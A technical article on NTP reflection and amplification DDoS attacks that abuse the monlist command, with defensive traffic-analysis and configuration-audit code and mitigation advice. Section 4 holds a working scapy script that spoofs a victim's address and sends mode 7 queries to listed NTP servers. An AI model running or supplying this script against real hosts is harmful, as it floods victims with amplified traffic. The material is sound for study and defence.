NTP-based reflection and amplification attacks (the NTP reply flood attack)


Contents

1. NTP introduction
2. NTP protocol format
3. Relationship between the NTP reflection vulnerability and the NTP protocol
4. Prerequisites for triggering the vulnerability and steps required for an attack
5. Reflections on attack and defense against the vulnerability


1. NTP introduction

Network Time Protocol (NTP) is a protocol used to synchronize computer clocks. It can synchronize computers with their servers or with clock sources (such as quartz clocks and GPS), it provides high-precision time correction (the difference from the standard is less than 1 millisecond on a LAN and tens of milliseconds on a WAN), and it supports cryptographic authentication to prevent malicious attacks on the protocol.

NTP provides accurate time. First, an accurate time source is required, and this time must be Coordinated Universal Time (UTC). The sources from which NTP can obtain UTC time are:

1. Atomic clocks
2. Astronomical observatories
3. Satellites
4. The Internet

In this way, an accurate and reliable time source is available. The time is then distributed according to NTP server level: all servers are classified into strata (layers) by their distance from the external UTC source.

1. Stratum 1, at the top layer, has direct access to the external UTC source
2. Stratum 2 gets its time from stratum 1
3. Stratum 3 gets its time from stratum 2, and so on

The total number of stratum layers is limited to 15. All these servers logically form a tiered architecture connected to each other, with the stratum 1 time servers as the basis of the entire system. Computer hosts are generally connected to multiple time servers; statistical algorithms filter the time from the different servers to select the optimal path and source for correcting the host clock. Even if the host cannot reach a server for a long time, the NTP service remains effective.
To prevent malicious damage to the time server, NTP uses an authentication mechanism to check whether the information actually comes from the declared server and checks the data return path, providing an anti-interference protection mechanism.

Introduction to NTP in the RFCs:

http://www.rfc-editor.org/search/rfc_search_detail.php?title=NTP&pubstatus%5B%5D=Any&pub_date_type=any

0x1: Time synchronization based on the NTP protocol

Device A (the client) and Device B (the NTP server) are connected over the network. Each has its own independent system clock, and they need to synchronize their system clocks automatically through NTP.

1. Before the system clocks of Device A and Device B are synchronized, the clock of Device A is set to 10:00:00 AM and the clock of Device B is set to 11:00:00 AM
2. Device B acts as the NTP time server, that is, Device A will synchronize its clock with Device B's clock
3. The time required for one-way transmission of an NTP packet between Device A and Device B is 1 second (the actual network latency may be greater than 1 second)
4. Device A sends an NTP packet to Device B. The packet carries the timestamp at which it leaves Device A, which is 10:00:00 AM (T1)
5. When the NTP packet arrives at Device B, Device B adds its own timestamp, which is 11:00:01 AM (T2)
6. When the NTP packet leaves Device B, Device B adds its own timestamp, which is 11:00:02 AM (T3)
7. When Device A receives the response message, the local time of Device A is 10:00:03 AM (T4)

During the entire NTP interaction process, both parties can obtain the parameters T1, T2, T3, and T4.

1. Round-trip delay of the NTP packet: delay = (T4 - T1) - (T3 - T2) = 2 seconds
2. Time difference between Device A and Device B: offset = ((T2 - T1) + (T3 - T4)) / 2 = 1 hour

By adding and subtracting the four parameters we find that the network delay is "eliminated" in the calculation, while the time difference between the two endpoints is doubled by the same elimination; dividing by 2 then gives the time difference between the two endpoints.
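The four-timestamp calculation above, carried through in code (an added example, not part of the original article). The first function reproduces the article's numbers; the second goes a step further than the text and shows that the "elimination" of the delay only holds when the two directions take equally long, the error being half the asymmetry.

```python
def to_seconds(hms: str) -> int:
    """Clock reading "HH:MM:SS" (24-hour) as seconds since midnight."""
    h, m, s = (int(x) for x in hms.split(":"))
    return h * 3600 + m * 60 + s

def delay_and_offset(t1: str, t2: str, t3: str, t4: str):
    """T1 and T4 are read on Device A's clock, T2 and T3 on Device B's.
    Returns (round-trip delay, offset of B relative to A) in seconds."""
    T1, T2, T3, T4 = (to_seconds(t) for t in (t1, t2, t3, t4))
    delay = (T4 - T1) - (T3 - T2)
    offset = ((T2 - T1) + (T3 - T4)) / 2
    return delay, offset

def offset_error_for_asymmetry(true_offset: float, fwd_delay: float, back_delay: float):
    """Simulate one exchange in which A->B takes fwd_delay seconds and B->A
    takes back_delay seconds, with B answering immediately. Returns the
    estimated offset and its error, which is (fwd_delay - back_delay) / 2:
    the formula only cancels the delay when the path is symmetric."""
    T1 = 0.0                                 # on A's clock
    T2 = T1 + fwd_delay + true_offset        # on B's clock, request arrives
    T3 = T2                                  # on B's clock, reply leaves
    T4 = T3 - true_offset + back_delay       # back on A's clock
    estimate = ((T2 - T1) + (T3 - T4)) / 2
    return estimate, estimate - true_offset

if __name__ == "__main__":
    # The article's numbers: A at 10:00:00, B at 11:00:00, 1 s each way
    print(delay_and_offset("10:00:00", "11:00:01", "11:00:02", "10:00:03"))  # (2, 3600.0)
    print(offset_error_for_asymmetry(3600, 1, 3))                             # (3599.0, -1.0)
```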

Relevant links:

http://baike.baidu.com/view/60648.htm
http://en.wikipedia.org/wiki/Network_Time_Protocol
http://zh.wikipedia.org/wiki/%E7%B6%B2%E7%B5%A1%E6%99%82%E9%96%93%E5%8D%94%E8%AD%B0


2. NTP protocol format

For more information about the NTP protocol format, see

http://www.cnblogs.com/littlehann/p/3810839.html (search for "0x1: NTP network protocol")


3. Relationship between the NTP reflection vulnerability and the NTP protocol

To understand the NTP amplification attack, we need to focus on one field in the protocol, the "Mode" field, which indicates the type and purpose of the NTP datagram. There are 7 modes in total:

0: undefined
1: symmetric active mode
2: symmetric passive mode
3: client mode
4: server mode
5: broadcast or multicast mode
6: NTP control packet (mode_control)
7: reserved for private use (mode_private)

Mode 7 packets are reserved for ntpdc (the NTP query client installed by default with ntp on GNU/Linux).

ntpdc supports many commands:

ntpdc -n -i time-a.nist.gov
ntpdc> ?

Among these commands is a risky one: monlist

The monlist command returns the last 600 client IP addresses that have synchronized with the target NTP server. This means that a small request packet yields a continuous stream of UDP packets containing a large number of active IP addresses.

In this case, the actual attack effect is:

1. The ratio of outgoing to incoming packets is 1:73
2. The ratio of data sent to data received is 234 bytes : 73 × 482 bytes, which is approximately 1:562
3. 10 M of communication traffic produces 5620 M of attack traffic

From this analysis we need to understand the concept of reflection. In essence, reflection attacks, IP spoofing and MAC spoofing rest on the same idea.

1. Normal situation: the client and server establish a UDP or TCP exchange, and data is transmitted between the client and the server
2. Reflection attack: the attacker forges the source IP address of the data packet as the victim's IP address and sends it to the server. From the server's point of view the packet comes from the victim, so the server responds to it and returns the corresponding response packet to the victim

The connectionless communication mode of UDP simplifies this process further: attackers can send a large number of forged packets to the server in a "stateless" manner without establishing any valid connection.

Attackers can use NTP servers on the Internet to perform a reflection DDoS attack. In effect, the NTP server unknowingly helps launch a high-volume attack against the victim.
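What the mode 7 monlist traffic described above looks like from the defender's side, as an added example (not code from the original article): the helper decodes the private-mode header fields (byte 0 carries the response and "more" flags, version and mode; byte 3 the request code; bytes 4-7 the item count and item size) and totals monlist request and response bytes per host, so the lopsided ratio stands out in a capture. The packet bytes and IP addresses are constructed samples.

```python
MODE_PRIVATE = 7          # mode value 7 = mode_private, the mode ntpdc uses
REQ_MON_GETLIST_1 = 42    # request code for monlist, carried in byte 3

def parse_ntp(payload: bytes) -> dict:
    """Decode just enough of an NTP header to recognise mode-7 traffic."""
    if len(payload) < 4:
        raise ValueError("NTP payload too short")
    b0 = payload[0]
    info = {"mode": b0 & 0x07, "version": (b0 >> 3) & 0x07}
    if info["mode"] == MODE_PRIVATE:
        # Mode-7 byte 0: bit 7 = response flag, bit 6 = more fragments follow
        info["response"] = bool(b0 & 0x80)
        info["more"] = bool(b0 & 0x40)
        info["request_code"] = payload[3]
        if len(payload) >= 8:
            # Bytes 4-7: 4-bit err / 12-bit nitems, 4-bit mbz / 12-bit item size
            info["nitems"] = ((payload[4] & 0x0F) << 8) | payload[5]
            info["item_size"] = ((payload[6] & 0x0F) << 8) | payload[7]
    return info

def monlist_stats(packets: list) -> dict:
    """Per-host monlist request count and bytes from (src, dst, payload) tuples."""
    stats = {}
    for src, dst, payload in packets:
        info = parse_ntp(payload)
        if info["mode"] != MODE_PRIVATE or info["request_code"] != REQ_MON_GETLIST_1:
            continue
        # Book a request to its (possibly spoofed) source, a response to the host that receives it
        host = dst if info["response"] else src
        s = stats.setdefault(host, {"requests": 0, "req_bytes": 0, "resp_bytes": 0})
        if info["response"]:
            s["resp_bytes"] += len(payload)
        else:
            s["requests"] += 1
            s["req_bytes"] += len(payload)
    for s in stats.values():
        s["ratio"] = s["resp_bytes"] / s["req_bytes"] if s["req_bytes"] else None
    return stats

# Constructed samples: one 48-byte monlist request claiming to come from 198.51.100.7,
# and three 440-byte reply fragments (six 72-byte entries each) sent back to it by 203.0.113.10.
MONLIST_REQ = bytes([0x17, 0x00, 0x03, 0x2A]) + bytes(44)
MONLIST_RESP = bytes([0xD7, 0x00, 0x03, 0x2A, 0x00, 0x06, 0x00, 0x48]) + bytes(6 * 72)
SAMPLE = [("198.51.100.7", "203.0.113.10", MONLIST_REQ)] + \
         [("203.0.113.10", "198.51.100.7", MONLIST_RESP)] * 3

if __name__ == "__main__":
    print(monlist_stats(SAMPLE))  # {'198.51.100.7': {'requests': 1, 'req_bytes': 48, 'resp_bytes': 1320, 'ratio': 27.5}}
```

On a real server-side capture a public NTP server should see no mode 7 monlist requests at all, so any entry from this helper is worth an alert before the ratio is even considered.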

Relevant links:

http://chenjiji.com/post/3761.html
http://blog.sina.com.cn/s/blog_459861630101b4wf.html
http://www.douban.com/note/171309770/


4. Prerequisites for triggering the vulnerability and steps required for an attack

The root cause of the NTP reflection DDoS vulnerability is a configuration weakness in the NTP server. Therefore the prerequisite for triggering it is that the server is configured this way, and whether a server is affected can be checked by looking at:

1. Whether the 'disable monitor' option is set in the ntp.conf configuration file
2. Whether a program is currently listening on UDP port 123

0x1: Test POC

#!/usr/bin/env python
# author: pangzi.me@gmail.com

import sys
from scapy.all import *

def attack(target, ntp_server):
    # one mode 7 packet per server, with the source address set to the target
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))

if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(1)

    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    # one NTP server address per line
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)

0x2: NTP reflection attack cases

https://isc.sans.edu/forums/diary/NTP+reflection+attack/17300
http://openntpproject.org/
http://www.internetsociety.org/doc/amplification-hell-revisiting-network-protocols-ddos-abuse
http://blog.cloudflare.com/technical-details-behind-a-400gbps-ntp-amplification-ddos-attack/
http://arstechnica.com/security/2014/01/new-dos-attacks-taking-down-game-sites-deliver-crippling-100-gbps-floods/
https://www.us-cert.gov/ncas/alerts/TA14-013A


5. Defense against the vulnerability

Summarizing the underlying causes of this vulnerability, we find that:

1. The non-equivalent exchange of this command (a 1:562 return): a single simple command obtains a large amount of echoed data
2. The ambiguity of the UDP protocol (no three-way handshake verification): attackers can send forged UDP attack packets at very low cost
3. The lack of an authentication mechanism on NTP servers

Together these make reflective DDoS attacks possible.

0x1: Repair/defense methods

1. Harden the NTP service
1) Upgrade the NTP server to 4.2.7p26
2) Disable the monlist function of the NTP service: add the 'disable monitor' option to the ntp.conf configuration file
3) Block UDP port 123 at the network egress
2. Defend against NTP reflection and amplification attacks
1) Because such attacks have obvious characteristics, ACLs at the network layer or implemented by the carrier can be used to defend against them
2) Use anti-DDoS devices for traffic scrubbing
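An added configuration audit (not from the original article) that serves both the check in section 4 ("is 'disable monitor' set?") and the hardening step above: it parses an ntp.conf, reports whether monitor is disabled and whether every default restrict line carries noquery, which blocks mode 6 and mode 7 queries at the access-control level. The two configurations below are constructed before/after samples; the directive names are ntpd's own.

```python
def audit_ntp_conf(text: str) -> list:
    """Return findings for the monlist-related hardening items; an empty list
    means 'monitor' is disabled and every 'restrict default' line has noquery."""
    monitor_disabled = False
    default_restricts = []            # (line, has_noquery) per restrict default line
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()    # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        if tokens[0] in ("disable", "enable") and "monitor" in tokens[1:]:
            monitor_disabled = tokens[0] == "disable"   # the last directive wins
        elif tokens[0] == "restrict":
            args = tokens[1:]
            if args and args[0] in ("-4", "-6"):        # optional address family
                args = args[1:]
            if args and args[0] == "default":
                default_restricts.append((line, "noquery" in args[1:]))
    findings = []
    if not monitor_disabled:
        findings.append("monlist reachable: add 'disable monitor' to ntp.conf")
    if not default_restricts:
        findings.append("no 'restrict default' line: add one with noquery")
    for line, has_noquery in default_restricts:
        if not has_noquery:
            findings.append(f"'{line}' lacks noquery")
    return findings

# Constructed before/after configurations
WEAK_CONF = """
server 0.pool.ntp.org
restrict default kod nomodify notrap nopeer
restrict 127.0.0.1
"""
HARDENED_CONF = """
server 0.pool.ntp.org
disable monitor
restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
"""

if __name__ == "__main__":
    print(audit_ntp_conf(WEAK_CONF))       # two findings
    print(audit_ntp_conf(HARDENED_CONF))   # []
```

The version check (4.2.7p26 or later) still has to be done against the running ntpd binary, which this file-level audit cannot see.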

Relevant links:

http://drops.wooyun.org/papers/926


Copyright (c) 2014 littlehann All Rights Reserved
